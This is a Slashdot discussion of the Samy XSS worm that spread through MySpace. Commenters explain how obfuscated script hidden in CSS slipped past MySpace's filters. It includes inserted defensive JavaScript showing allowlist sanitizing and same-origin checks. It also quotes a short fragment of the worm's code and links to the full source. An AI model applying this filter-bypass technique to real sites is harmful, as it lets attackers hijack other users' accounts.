
Cross-Site Scripting Worm Floods MySpace

Zonk posted about 9 years ago | from the why-would-you-want-to-do-anything-on-myspace dept.

Security 321

DJ_Vegas writes "One clever MySpace user looking to expand his buddy list recently figured out how to force others to become his friend, and ended up creating the first self-propagating cross-site scripting (XSS) worm. In less than 24 hours, 'Samy' had amassed over 1 million friends on the popular online community. According to BetaNews, the worm's code utilized XMLHTTPRequest - a JavaScript object used in AJAX Web applications and was spreading at a rate of 1,000 users every few seconds before MySpace shut down its site. Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet."


unbeleivamable (-1, Offtopic)

Anonymous Coward | about 9 years ago | (#13789905)

omg frist p0st!

Re:unbeleivamable (-1, Offtopic)

Anonymous Coward | about 9 years ago | (#13790028)

I work for frist p0st.

So I am really getting a kick out of most of these replies.

Some of you guys are very good at making it sound like you know what you are talking about.

But trust me.... You don't.

I think you just want to make yourself sound smart, when in reality you don't know what you are talking about.

This is how bad info gets passed around.

If you don't know about the topic... don't make yourself sound like you do.

Cuz some Slashdotters believe anything they hear.

Day late, dollar short. (-1, Flamebait)

Veamon69 (904767) | about 9 years ago | (#13789910)

Awesome. Only about a week late. Heard it on a podcast monday. Goodbye slashdot, you are always late and have reached official sucktivity.

Re:Day late, dollar short. (0)

Anonymous Coward | about 9 years ago | (#13789958)

ja slashdot is teh suck. only a place for l4m3 ch00bs to hang out. m0r0ns.

Re:Day late, dollar short. (4, Insightful)

Iriel (810009) | about 9 years ago | (#13789973)

These '/. is slow and stupid' kind of posts just need to stop. But I listen to 4 different tech podcasts and hadn't heard about this yet. Think about the people who check /. for news while they're at work and most likely away from iTunes and their bookmarks, and (god-forbid) without a readily accessible aggregator. Realize this site for what it is: for the majority of it, other techies posting news they've heard about to a community they might think will care to hear it. This isn't "news as it happens updated every second" so stop treating it like it is.

Re:Day late, dollar short. (1, Insightful)

Anonymous Coward | about 9 years ago | (#13790020)

So true. Don't go away mad kids, just go away

Re:Day late, dollar short. (1)

cuzality (696718) | about 9 years ago | (#13790061)

What tech podcasts do you listen to? The only one I have really gotten into is TWiT -- any recommendations?

Re:Day late, dollar short. (1)

Iriel (810009) | about 9 years ago | (#13790189)

This is partially based on my programming prefs, but I listen to TWiT, CradCast, Pro PHP, and WebDevRadio (and I'm still looking for more good ones with more frequent updates). Though I've been meaning to check out http://www.techpodcasts.com/ [techpodcasts.com]

Re:Day late, dollar short. (2, Insightful)

gothfox (659941) | about 9 years ago | (#13790130)

Not just that. I don't know about others, but I read slashdot primarily for discussions, not raw news. There is a lot of places to flood you with news, but much less where you can actually read coherent discussions on the subject. Yes, slashdot's moderation system is far from ideal, but there actually _are_ insightful and interesting comments to read, not just "OMG LOL" babble.

Re:Day late, dollar short. (-1, Offtopic)

Anonymous Coward | about 9 years ago | (#13790203)

so much tr0ll1ng 2 do, so l1ttle tiem.

Re:Day late, dollar short. (3, Insightful)

mwvdlee (775178) | about 9 years ago | (#13790047)

If /. sucks so much, why are you still here?

Re:Day late, dollar short. (2, Funny)

the_wesman (106427) | about 9 years ago | (#13790118)

cause myspace went down

Re:Day late, dollar short. (1)

(H)elix1 (231155) | about 9 years ago | (#13790207)

If /. sucks so much, why are you still here?

For the chicks, duh...

Re:Day late, dollar short. (0)

Anonymous Coward | about 9 years ago | (#13790059)

Considering that Slashdot links to stories on other sites you're never going to see it here first. Get it?

XSS? (5, Informative)

mindstrm (20013) | about 9 years ago | (#13789915)

Is it really XSS if it's all happening at the same site? Just sayin.....

XMLHTTP has a same-site policy... the problem here is they let users render html & javascript in their own pages on the site. If slashdot allowed executable javascript in the comments, we'd have the same problem.

Re:XSS? (5, Informative)

Skye16 (685048) | about 9 years ago | (#13789933)

No, they don't let you render JavaScript on the site. If you RTFA, he split the word "java script" into two lines, hid it in a CSS tag, and IE read it anyway. MySpace has stripped out tags for at least a year and a half.

Re:XSS? (2, Informative)

Skye16 (685048) | about 9 years ago | (#13789952)

Goddammit, this is what I get for not previewing.

"he split the word 'JavaScript' into two lines", and "MySpace has stripped out JavaScript and <script> tags for at least a year and a half"

IE is too forgiving (4, Insightful)

benhocking (724439) | about 9 years ago | (#13789986)

In the past, I've been of mixed feelings with IE correctly rendering the "intent" of a web-designer when the web-designer has created buggy HTML - this includes such things as omitting terminating tags (e.g., &ltl\li>) as well as a few other things. The result of IE doing this was that some web pages look good in IE that didn't look good in other browsers - thus encouraging more people to use IE. As HTML was being used more and more by the masses, there seemed some logic to this. Of course, one of the problems with this idea is that the designers were looking at their web-pages in IE to see if their code was written correctly.

This story just goes to emphasize the importance of calling buggy HTML code what it is, and not trying to infer the intent of the HTML coder. Samy cleverly found a way to make "buggy code" that would get past MySpace's filter, but that would be rendered the way he intended by the browser with the majority market share.

Re:IE is too forgiving (1)

saforrest (184929) | about 9 years ago | (#13790110)

omitting terminating tags (e.g., &ltl\li>)

You seem to have been meaning to write '</li>': just out of curiosity, did you deliberately omit the semicolon in the HTML entity for 'less than'? I ask because that (omitting the ;) is another example of what you're complaining about. :)

No irony was intended (4, Funny)

benhocking (724439) | about 9 years ago | (#13790218)

No, actually my pinky finger slipped and hit the "l" instead of the ";". I won't even try to explain how such a slip is possible as my other finger should have been in the way. I think I'm gonna blame quantum tunneling.

Re:IE is too forgiving (4, Insightful)

Kawahee (901497) | about 9 years ago | (#13790138)

This exploit isn't limited to IE, Safari also has this problem. And I'd probably attribute it to 'logical' coding
pseudo-C code:

if (strcmp(tagname, "style") == 0 && strcmp(tagtype, "text/css") == 0) {
    process_stylesheet(taginfo);
} else if (strcmp(tagname, "style") == 0) {
    /* a style block whose type is anything but text/css: instead of being
       ignored it is dispatched on its type, and text/javascript gets run */
    if (strcmp(tagtype, "text/javascript") == 0) {
        process_js(taginfo);
    }
}

But hopefully something less obvious that doesn't scream security flaw.

Re:IE is too forgiving (2, Interesting)

smooth wombat (796938) | about 9 years ago | (#13790188)

In the past, I've been of mixed feelings with IE correctly rendering the "intent" of a web-designer when the web-designer has created buggy HTML - this includes such things as omitting terminating tags (e.g., &ltl\li>) as well as a few other things

I once made a comment in the Firefox forums about the difference between the way IE and Firefox interpret web pages. IE believes that everyone is an idiot and will pat the designer on the head and fix the errors without telling you what you did wrong. Firefox on the other hand presumes you are reasonably competent at what you are doing and will let you know when you screw up.

Re:XSS? (0)

Anonymous Coward | about 9 years ago | (#13790078)

And the winner for Most Confused use of Jargon goes to... you!

They don't let you "render" Javascript on the site because humans don't render anything. It's web browsers that do the rendering. There's no such thing as a CSS tag either.

That's Irrelevant (1)

BobPaul (710574) | about 9 years ago | (#13790097)

I don't care how he got the javascript to load. The fact of the matter is he got it to load. While it's Microsoft's fault for shipping a faulty browser, it's still the website's fault for not properly filtering. You can't just block the words "Javascript" and "Script" and call it good.

Re:That's Irrelevant (1)

Delirium Tremens (214596) | about 9 years ago | (#13790215)

You're right. The least they could have done was to look at the source code for IE and analyze its logic for the interpretation of script tags.
... Oh wait ...

Re:That's Irrelevant (3, Insightful)

Bogtha (906264) | about 9 years ago | (#13790250)

I don't care how he got the javascript to load. The fact of the matter is he got it to load. While it's Microsoft's fault for shipping a faulty browser, it's still the website's fault for not properly filtering.

That's not the right attitude. The problem lies with web browsers that accept non-standard code.

Malicious code comes in two flavours - code that is outright malicious, and code that is completely benign in browsers that conform to the W3C specifications, but is interpreted wrongly by some browsers to generate a malicious effect.

The first type is easy to filter out, because you can go to the spec and see how things are meant to be interpreted, and from that determine what should be filtered out. The other type, though, is much harder to filter out, as you also need to be aware of all the little quirks and foibles of all browsers likely to be used to access your web application - something that isn't written down anywhere most of the time.

For example, you might have written code that strips out HTML tags. That's fine, except some versions of Netscape Navigator 4.x treat entirely different Unicode characters as if they were < and >. As a web developer, you have no way of knowing about this unless you are privy to some of the most obscure browser trivia in the world, so unless you take a default deny policy and outlaw any non-ASCII characters (goodbye international visitors), you are likely to write code that is vulnerable to this attack - for Netscape 4 users.

Now multiply that problem by all browsers in use today, and all the little quirks and deviations from spec. that they have, and you'll start to get an idea of why it's not feasible for web developers to be responsible for this problem, and why the responsibility lies at the browser developers' feet.

Re:XSS? (1)

NicenessHimself (619194) | about 9 years ago | (#13789947)

The attack did include uri rewriting from profiles.myspace.com to www.myspace.com precisely to cross the sites with script. Does that count as XSS? I wonder how many /.ers are about to start seeing what kind of html they can get through the /. forum checker..

Re:XSS? (1)

SerpentMage (13390) | about 9 years ago | (#13789949)

I think the problem is that the MySpace site allows javascript to be uploaded.

http://blog.outer-court.com/archive/2005-10-13-n73.html [outer-court.com]

From the perspective of XMLHttpRequest you cannot call a domain that is not the original HTML page's. IE, Mozilla, and Safari implement a same-domain policy and, having experimented, it is not possible.
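
The same-domain rule the last two comments describe, as an added example (not code from the page or from the worm): XMLHttpRequest compares scheme, host and port, so profiles.myspace.com and www.myspace.com are two different origins even though they share a registrable domain. The hostnames are the ones named in this thread; the paths and the "addfriend" endpoint are made up for illustration, and rewriteNeededFor is a simplified model of the rewrite NicenessHimself mentions, not the worm's own logic.

```javascript
// Added example, not from the page or from the worm itself: the scheme/host/
// port comparison behind the same-domain policy, applied to the two MySpace
// hosts named in the thread. Paths and endpoint names are constructed.

// An origin is scheme + host + port. Path, query and fragment play no part.
function originOf(url) {
  const u = new URL(url);
  const port = u.port || (u.protocol === "https:" ? "443" : "80");
  return `${u.protocol}//${u.hostname}:${port}`;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Model of the rewrite the comment mentions (an assumption, not the worm's
// code): script running on pageUrl wants to XMLHttpRequest targetUrl. If the
// origins differ, return the URL the page would have to move to (same path,
// target's scheme and host) before the request is allowed; null if no move
// is needed.
function rewriteNeededFor(pageUrl, targetUrl) {
  if (sameOrigin(pageUrl, targetUrl)) return null;
  const moved = new URL(pageUrl);
  const target = new URL(targetUrl);
  moved.protocol = target.protocol;
  moved.host = target.host;            // host setter takes "hostname[:port]"
  return moved.toString();
}

// Constructed sample URLs (hostnames from the thread, paths invented).
const PROFILE_PAGE = "http://profiles.myspace.com/profile?id=123";
const FRIEND_API = "http://www.myspace.com/addfriend";

console.log(sameOrigin(PROFILE_PAGE, FRIEND_API));      // false: different host
console.log(rewriteNeededFor(PROFILE_PAGE, FRIEND_API)); // where the page must go first
```

Note that a port written explicitly as :80 on an http URL is the same origin as one with no port, while the same host over https is not; the origin check is exact, not "same site".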

Re:XSS? (2, Insightful)

sadcox (173714) | about 9 years ago | (#13789953)

the problem here is they let users render html & javascript in their own pages on the site

No, the problem is that they let users render html & javascript badly in their own pages on the site

Re:XSS? (5, Funny)

ArsenneLupin (766289) | about 9 years ago | (#13789991)

If slashdot allowed executable javascript in the comments, we'd have the same problem.

Given its userbase, if Slashdot allowed this, it would have far far far worse problems. Like "if you ever read the wrong Slashdot comment with Internet Explorer, you'll leave a goatse picture on every ASP and Cold Fusion website you visit thereafter..."

Re:XSS? (0)

Anonymous Coward | about 9 years ago | (#13790165)

wait a second... that's already happened! All the websites I visit have the goatse guy.

AJAX vulns (3, Insightful)

bloodredsun (826017) | about 9 years ago | (#13789928)

Is this the first AJAX vulnerability? Something like this would be expected in any new-ish tech that is increasing in popularity.

Re:AJAX vulns (0)

Anonymous Coward | about 9 years ago | (#13789965)

Not the first AJAX exploit. The Greasemonkey one a while back is similar, as is another white paper on the site listed below. This site details the anatomy of an XSS worm:
http://www.securiteam.com/securityreviews/6H00D0KEAY.html [securiteam.com]

Re:AJAX vulns (1)

Narcissus (310552) | about 9 years ago | (#13790071)

This isn't an AJAX vulnerability: it's XSS that uses AJAX to do its thing. The vulnerability itself is entirely a server side issue. Well, as far as I understand it, anyway...

Re:AJAX vulns (2, Informative)

erlenic (95003) | about 9 years ago | (#13790150)

As others have pointed out elsewhere, it was an IE issue. MySpace apparently does filter out the word "javascript", but this guy was able to use a problem in IE to split the word across two lines, and put it inside some CSS code. For some reason, IE sees fit to execute code like that.

Re:AJAX vulns (1)

WhoDey (629879) | about 9 years ago | (#13790093)

Someone didn't quite get the point. This has nothing to do with any vulnerability in AJAX. Cross-site scripting is a result of a web app doing a poor job of redisplaying input that it was given. This was combined with a javascript object to do some malicious stuff. While that javascript object is used in AJAX applications, this is certainly not an AJAX vulnerability.

Aww... (5, Funny)

Anonymous Coward | about 9 years ago | (#13789930)

Myspace was out for a bit? Now you've REALLY given those emo kids something to cry about.

Re:Aww... (5, Funny)

mikael (484) | about 9 years ago | (#13789995)

I bet he doesn't have over 1 million friends now.

Re:Aww... (4, Insightful)

maxwell demon (590494) | about 9 years ago | (#13790070)

Well, having over 1 million foes is also an achievement ...

First! (-1, Offtopic)

Anonymous Coward | about 9 years ago | (#13789943)

Roses are red
Violets are blue
I love you more
than my CPU!

I find this amusing... (4, Interesting)

Coocha (114826) | about 9 years ago | (#13789944)

I've got a Myspace page, because it's the most convenient way to keep in touch with some of my old classmates. I've often thought about how few practical applications these kinds of 'social networking' sites provide, aside from general time-wasting. I've also scoffed at the number of young kids who have thousands of friends, as if it's the high school popularity contest in digital form.

So this guy found a way to win the popularity contest. I scoff at him too, though at the same time I must laud him for his creativity. If other /.ers have insight as to what kind of malicious applications his XSS could be used for, I welcome the opportunity to learn. Also, what exactly IS XSS? Cross-site (to me) indicates that the script performs a function across multiple webpages... would this refer to all the peers in the Myspace cluster?

Re:I find this amusing... (1)

FluffyPanda (821763) | about 9 years ago | (#13790181)

The only XSS reference I can find is that he was able to access profiles from www.myspace.com while the user thought they were on profiles.myspace.com

Re:I find this amusing... (1)

giorgiofr (887762) | about 9 years ago | (#13790278)

I humbly suggest "Gratuito come birra e libero come formaggio" ("free as in beer and free as in cheese") as the next release of your sig. It still makes no sense but it's funnier. :)

Re:I find this amusing... (3, Interesting)

lav-chan (815252) | about 9 years ago | (#13790260)

I've got a Myspace page, because it's the most convenient way to keep in touch with some of my old classmates. I've often thought about how few practical applications these kinds of 'social networking' sites provide, aside from general time-wasting. I've also scoffed at the number of young kids who have thousands of friends, as if it's the high school popularity contest in digital form.

Yeah, well, you're gonna expect that anywhere i guess. LiveJournal, Xanga, MySpace, BlogSpot, where-ever. I personally think MySpace does the best job of 'bringing it all together', though (blogs, message boards, friends, profiles, it's all so interconnected).

That said, MySpace is probably one of the worst-written sites of all time. Tom seems like a swell guy (i've talked to him a few times), but he and/or his team couldn't design a site if their lives depended on it. I mean that in terms of both the HTML and the 'server-side' stuff. They're constantly doing maintenance (which hardly ever seems to fix anything); they do completely random text-filtering (like you can't say '% of', the system will strip it out); the time zones are always wrong; you have to post blogs twice sometimes in order to get the auto-formatting to work; their HTML/CSS is terrible (most of their ids and classes have illegal names); the blog's design editor is retarded because the default style sheet is set to override your custom style sheet (so i'm not sure what the point is of even having the option); and so on.

Tom says he's working on a 'CSS-friendly' version of MySpace, and it seems like that's the case because suddenly there's a bunch of unused stuff if you look at the style sheet, but i have doubts that it's actually going to be much better. ... Or if it's even going to be 'CSS-friendly'.

:shrug:

Re:I find this amusing... (1)

hazzey (679052) | about 9 years ago | (#13790291)

The same thing has been done with FaceBook. The only difference is that FaceBook still requires each user to actually accept the friendship. That doesn't stop people from running a script that invites everyone to be their friend.

Go Samy! (4, Funny)

jeek (37349) | about 9 years ago | (#13789951)

Go Samy! We're rooting for you over at EFnet #olsentwins!@

More info... (5, Informative)

TheSync (5291) | about 9 years ago | (#13789960)

Here is a recent paper on XSS viruses [bindshell.net] . Also there is an analysis [livejournal.com] of the specific MySpace worm.

Evidently LiveJournal and other sites take care to scrub out JavaScript in user-provided web pages, but the rumors are that sometimes people do figure out how to obfuscate their HTML enough to deliver the payload, despite the scrubbers.

Re:More info... (1)

neoform (551705) | about 9 years ago | (#13789998)

It's not really shocking that MySpace lets this sort of thing through. I've always been completely unimpressed with MySpace's design... it's always been a wonder to me why people use it, other than the obvious "everyone else is using it" syndrome.

kinda reminds me of windows..

Re:More info... (1)

F_Scentura (250214) | about 9 years ago | (#13790103)

Are you serious? "Everyone else is using it" is *the* draw for a social networking site. Its interface is decent, and it handled the Friendster migration without the same level of outages.

Re:More info... (0)

Anonymous Coward | about 9 years ago | (#13790127)

it's not really shocking that MySpace lets this sort of thing through

Please RTFA.

Re:More info... (1, Informative)

slavemowgli (585321) | about 9 years ago | (#13790065)

Livejournal disallows Javascript (and even CSS) on their users' user info pages, but not in the actual journal entries.

Re:More info... (1)

nine-times (778537) | about 9 years ago | (#13790226)

Evidently LiveJournal and other sites take care to scrub out JavaScript in user-provided web pages, but the rumors are that sometimes people do figure out how to obfuscate their HTML enough to deliver the payload, despite the scrubbers.

MySpace also scrubs javascript. This guy put obfuscated javascript into CSS for delivery.

Re:More info... (5, Insightful)

Jerf (17166) | about 9 years ago | (#13790258)

And it gets through because stupid programmers persist in making two mistakes:
  1. Defining "badness" instead of "goodness"
  2. Trying to "clean up" invalid code
The first one means that you try to list all of the ways that the input can be bad. The Universe is evil and it hates you. You can't list all the funky things that it can do to you. Instead, list the good things and carefully verify that the input is good.

For a simple, but very very real-world example, don't write a rule that says "If the password contains /, =, or \, reject it." Write a rule that says "Passwords may contain only letters, numbers, and underscores." In the first case, especially in the brave new world of Unicode, you'll never enumerate all the bad things that can happen.

The second mistake is that once you've decided that input is bad, do not try to clean it up. The process of cleaning it up may itself make it invalid in the case of something like HTML. Just reject it with a good error message and let the user take care of it.

If that is absolutely impossible, preferably on the lines of "you'll be fired if you don't clean it up", then at the very least, you must continue to recursively run the cleanup code until the input converges (is unchanged by the cleanup code).

It's not that it's absolutely impossible to get it right if you don't follow these rules, it's just that it's really freakin' hard. Slashdot, for instance, does seem to manage, but it took them a few iterations and ultimately, it's a low-priority site even if it does get hacked a little. Is your program that unimportant?

It's way, way easier to define legit HTML (specific tags, no attributes usually though it's easy to let a few specific ones through, even with a handful of specific values) than it is to create a function to take any arbitrary string and make "safe" HTML out of it.

Back in my day (4, Funny)

Dachannien (617929) | about 9 years ago | (#13789961)

And to think that, back in the day, people made friends by actually talking to other people.

And the phrase for self-replicating viruses was... (5, Funny)

benhocking (724439) | about 9 years ago | (#13790025)

And the phrase for self-replicating viruses was "gossip". Unfortunately, the viruses would occasionally replicate with mutations, but this only made them stronger.

Woefully inefficient (1)

jfengel (409917) | about 9 years ago | (#13790064)

How are you gonna make a million friends a day that way? Progress, my boy, progress!

Re:Back in my day (1)

n7022c (918189) | about 9 years ago | (#13790068)

That is SOOO low-tech, dude.

Re:Back in my day (5, Funny)

FlopEJoe (784551) | about 9 years ago | (#13790081)

Almost sad... hacking for online "friends." Like how my mother had to tie some liver to my collar to get the family dog to play with me :(

Re:Back in my day (0)

Anonymous Coward | about 9 years ago | (#13790143)

That's the same argument people used to make against email and IM.

Well, people have been saying it's a security risk (0)

g_dunn (921640) | about 9 years ago | (#13789962)

And people still leave it enabled in absurd situations like this. Hopefully MySpace and the other journal-esque sites who still have javascript enabled get a clue. While their poor security only affected themselves this time, someone with more malicious intent could easily take advantage of this for a lot more destructive actions than merely viral friendmaking.

Re:Well, people have been saying it's a security r (4, Insightful)

-kertrats- (718219) | about 9 years ago | (#13790095)

They don't have javascript enabled. As far as I can tell, he just used IE's magical ability to run broken code so that the browser would be able to piece together the mess he used, but Myspace wouldn't be able to tell it was javascript.

Re:Well, people have been saying it's a security r (0)

Anonymous Coward | about 9 years ago | (#13790168)

I browse with javascript disabled and have for 5 years; it immunises me against the majority of browser exploits. You can't stop morons running embedded script, but webmasters can at least make sure their site works for that 5% of us with a clue. For more complex webapps, they can provide the security-conscious with an alternate signed tarball or browser extension (that doesn't load/eval() script from remote servers).

Awesome (5, Funny)

AForwardMotion (586699) | about 9 years ago | (#13789968)

He'll probably get a lot of job offers from this.

Terrorism! (0)

Anonymous Coward | about 9 years ago | (#13789969)

Subverting MySpace to create 1,000 friends per second? Obviously a terrorist. Send him to Gitmo!

The Microsoft curse? (0)

alucinor (849600) | about 9 years ago | (#13789976)

So ... MS invents XMLHttpRequest ... what's logically to follow with *any* new technology MS invents? Here's for hoping that their "magic touch" will end here.

Here's the Guys Explanation of his code (5, Informative)

putko (753330) | about 9 years ago | (#13789997)

Here [namb.la] is his explanation -- it goes over the transformations he had to make to the program to smuggle it past Myspace's filters.

And here [namb.la] is his version of the story.

He comes off as a sweet practical joker. But maybe that's just b.s. that he cooked up after he realized he might have some 'splainin' to do.

Also, his site really is "namb.la" -- he's making some sort of joke at NAMBLA's expense, which is pretty suspect, I think.

Re:Here's the Guys Explanation of his code (0)

Anonymous Coward | about 9 years ago | (#13790144)

You're kidding right? I thought NAMBLA's mission statement was to be the butt <sic> of jokes.

Re:Here's the Guys Explanation of his code (1)

fmwap (686598) | about 9 years ago | (#13790220)

Wow, this guy is so fucked...

Not only releasing a self propagating worm, but openly confessing to copyright infringement in his explanation.

If I were Samy, I'd be on the first flight out of the country.

samy is my hero (5, Informative)

gr8n10zt (782694) | about 9 years ago | (#13790006)

The scoop from himself: http://fast.info/myspace/ [fast.info]

In the beginning (3, Insightful)

Dogsbody_D (579981) | about 9 years ago | (#13790013)

This was bound to happen sooner or later, as MySpace repeats the history of the internet. Just look at the huge number of practically unreadable webpages with different size fonts and different colours, terribly inappropriate background images. Oh, and a load of commercial interests trying to stuff things down our throats. Loads of chicks though... ;)

Re:In the beginning (2, Informative)

White Shade (57215) | about 9 years ago | (#13790116)

there ARE lots of chicks, yes, but they're all 15 years old! (claiming to be 99, and that they're "bi", and "married" to their favourite female friend from middle school, haha)

myspace is certainly addictive though ;)

Interview with "Samy" (2, Informative)

Bananatree3 (872975) | about 9 years ago | (#13790017)

There is some guy's blog that has a personal interview with Samy, the writer of this "my hero" worm, here [outer-court.com].

Funny! (0, Flamebait)

kurt_ram (906111) | about 9 years ago | (#13790031)

Ha.. It is funny. The author *had* to bring "IE" into the discussion. Maybe it is his way to make sure that his submission is approved. Since we all know how the Firefox fanboys here tend to believe that Firefox is so much safer, more l33t and k3wl than IE.

Not Funny! (1)

boy_of_the_hash (622182) | about 9 years ago | (#13790206)

Sorry, Firefox doesn't execute script from within CSS files.

Don't you hate when you forget stuff? (4, Funny)

UserGoogol (623581) | about 9 years ago | (#13790034)

Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.
FUCK! I knew I forgot to do something. I forgot to set the evil bit!

Clever MySpace users? (-1, Flamebait)

jamesgamble (917138) | about 9 years ago | (#13790067)

There are actually clever MySpace users? Wow, I'm shocked! What's next? People at Match.com without STDs?

XSS basics (4, Informative)

flanker (12275) | about 9 years ago | (#13790075)

Cross-site scripting is a family of vulnerabilities that share these attributes: a) a web-site that takes and displays text (e.g. Slashdot allows you to post comments) and b) a web browser that processes javascript in webpages.

The exploit involves placing javascript code into your posting on a website, such that when other people visit the website their browsers download your comment with the embedded javascript, which is then processed. The javascript, because it is being processed on your machine as part of the rendering of the page, can be used to exploit all sorts of vulnerabilities within browsers. When you have browsers tightly coupled with operating systems, this can open up some rather scary scenarios.

In this case, the guy just used the vulnerability to make some relatively benign changes, but he could have just as easily exploited some of the many problems with IE to be more malicious.
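
The mechanics described in flanker's summary above and in Jerf's two rules (define goodness, not badness; never "clean up" without checking the result converges), plus the "java" + newline + "script" split that Skye16 and erlenic describe, as one added example. This is not code from the page, from Samy, or from MySpace, and the allowed tag and attribute sets are an assumed policy, not MySpace's filter rules. It puts a denylist filter of the kind the thread describes beside an allowlist sanitizer and shows the split keyword walking past the first and not the second.

```javascript
// Added example for this thread, not code from the page, from Samy, or from
// MySpace. A denylist filter, the "java"+newline+"script" split that gets
// past it, an allowlist sanitizer rebuilt from parsed tokens, and the
// run-until-unchanged check. ALLOWED is an assumed policy, not MySpace's.

// Mistake 1: define badness. One pass, case-insensitive.
const DENY = /javascript|<\/?script\b[^>]*>/gi;
function denylistFilter(html) {
  return html.replace(DENY, "");
}

// Jerf's fallback rule: run a cleanup until its output stops changing.
function toFixedPoint(filter, input, maxRounds = 10) {
  let cur = input;
  for (let round = 1; round <= maxRounds; round++) {
    const next = filter(cur);
    if (next === cur) return { output: cur, rounds: round, converged: true };
    cur = next;
  }
  return { output: cur, rounds: maxRounds, converged: false };
}

// Idempotent text escaping: an existing "&amp;" or "&lt;" is left alone, so a
// second pass over sanitizer output changes nothing. A naive "&" -> "&amp;"
// would never converge under the check above.
function escapeText(s) {
  return s
    .replace(/&(?!(?:[a-z]+|#\d+|#x[0-9a-f]+);)/gi, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Define goodness instead: tags and attributes not listed here do not exist.
// No style attribute at all, so there is nowhere to host a CSS-smuggled script.
const ALLOWED = { b: [], i: [], u: [], p: [], br: [], em: [], strong: [], a: ["href"] };
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Accept only an absolute http(s) URL with no whitespace or control
// characters, so "java<newline>script:" cannot be smuggled into an href.
function safeHref(value) {
  return /^https?:\/\/[^\s\x00-\x1f"'<>]+$/i.test(value) ? value : null;
}

// Parse the input into tags and text, then rebuild every surviving tag from
// the parsed pieces. Nothing from the input is copied through verbatim.
function allowlistSanitize(html) {
  const TOKEN = /<\/?([a-z][a-z0-9]*)\b([^>]*)>|[^<]+|</gi;
  const ATTR = /([a-z][a-z0-9-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
  let out = "";
  for (const [tok, rawName, rawAttrs] of html.matchAll(TOKEN)) {
    if (rawName === undefined) {          // text node, or a stray "<"
      out += escapeText(tok);
      continue;
    }
    const name = rawName.toLowerCase();
    // hasOwn, not "in": "<constructor>" would otherwise hit Object.prototype.
    if (!hasOwn(ALLOWED, name)) continue; // unknown tag: dropped, text kept
    if (tok[1] === "/") { out += `</${name}>`; continue; }
    let attrs = "";
    for (const a of rawAttrs.matchAll(ATTR)) {
      const key = a[1].toLowerCase();
      const val = a[2] ?? a[3] ?? a[4] ?? "";
      if (!ALLOWED[name].includes(key)) continue;
      const clean = key === "href" ? safeHref(val) : val;
      if (clean !== null) attrs += ` ${key}="${escapeText(clean)}"`;
    }
    out += `<${name}${attrs}>`;
  }
  return out;
}

// Constructed sample inputs: the split keyword inside a style attribute, as
// the thread describes, and a nested keyword that survives one stripping pass.
const SPLIT_SAMPLE = "<div style=\"background:url('java\nscript:alert(1)')\">hi</div>";
const NESTED_SAMPLE = "javajavascriptscript";
const MIXED_SAMPLE =
  '<B onclick="alert(1)">bold</B> <a href="javascript:alert(1)">x</a> ' +
  '<a href="https://example.com/?a=1&b=2">ok</a> 1 < 2';

function demo() {
  return {
    denylistMissesSplit: denylistFilter(SPLIT_SAMPLE) === SPLIT_SAMPLE,
    allowlistOnSplit: allowlistSanitize(SPLIT_SAMPLE),
    onePassNested: denylistFilter(NESTED_SAMPLE),
    fixedPointNested: toFixedPoint(denylistFilter, NESTED_SAMPLE),
    allowlistMixed: allowlistSanitize(MIXED_SAMPLE),
    allowlistConverges: toFixedPoint(allowlistSanitize, MIXED_SAMPLE),
  };
}

console.log(demo());
```

The denylist never sees "javascript" in the split sample and passes it untouched, and one pass over "javajavascriptscript" leaves "javascript" behind; the fixed-point loop needs three rounds to empty it. The allowlist version drops the div (and its style attribute) entirely while keeping the text, strips the onclick, rejects the javascript: href, and produces output that a second pass leaves byte-for-byte unchanged.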

XMLHttpRequest (1)

matth1jd (823437) | about 9 years ago | (#13790086)

Everyone knows that XMLHttpRequest isn't secure. Where do we go from here? Is there a way to force the object to use SSL? Is there too much overhead in encrypting and decrypting the XML data with Blowfish or another algorithm?

Re:XMLHttpRequest (3, Informative)

patio11 (857072) | about 9 years ago | (#13790267)

What would encrypting anything have accomplished, exactly? The problem isn't that someone intercepted a legitimate transfer in the middle and modified it to be evil. The problem is that one end of the legitimate transfer was compromised, and the other end of the legitimate transfer was too trusting of the input from the compromised end, and then happily passed along that input (perfectly legitimately) to other parties who were then compromised themselves.

Re:XMLHttpRequest (1)

Slashcrap (869349) | about 9 years ago | (#13790282)

Is there a way to force the object to use SSL?

Yes, I'm sure that there is.

Is there too much overhead in encrypting and decrypting the XML data with Blowfish or another algorithm?

Probably not, for most sites and applications.

But the point is that encrypting the network traffic between the client and the server would have done nothing to prevent this vulnerability. Or most others for that matter. The only thing encryption would prevent is the snooping of traffic between client & server.

Obligatory... (3, Funny)

kukickface (675936) | about 9 years ago | (#13790091)

All your friends... All your friends... All your friends are belong to us. It's the mega-happy-funtime disco hit of 2005!

Here is the source: (1, Redundant)

rpcxdr (796317) | about 9 years ago | (#13790102)

The source [namb.la] and the explanation.

The Code (2, Informative)

pturpin (801430) | about 9 years ago | (#13790105)

Here [livejournal.com] is a link to the blog entry the article mentions that contains the code of the worm. (From Evan Martin of Google)

Clever kid... (0)

Anonymous Coward | about 9 years ago | (#13790112)

...I think I definitely want to be his buddy. :)

Unpatched security holes? (2, Funny)

phlegmofdiscontent (459470) | about 9 years ago | (#13790122)

Wait, there are unpatched security holes in IE? From all I've heard lately, it's way more secure than Firefox. How could Microsoft let this happen????

Aww...so close... (0)

Anonymous Coward | about 9 years ago | (#13790154)

Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.

"Thankfully"? Isn't that what we want? I mean...not so much the botnet, but more the whole MySpace-being-nuked thing. :-)

Emokids cry out! (1)

Kylere (846597) | about 9 years ago | (#13790160)

In a collective mass, millions of overly pale and under-educated emo kids could be heard to scream as their only hope of getting laid timed out.

Myspace, The AOL for 2005!

maybe... (0)

Anonymous Coward | about 9 years ago | (#13790182)

after perusing his site, i happened to notice this in the comments on one of the pages...

0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}
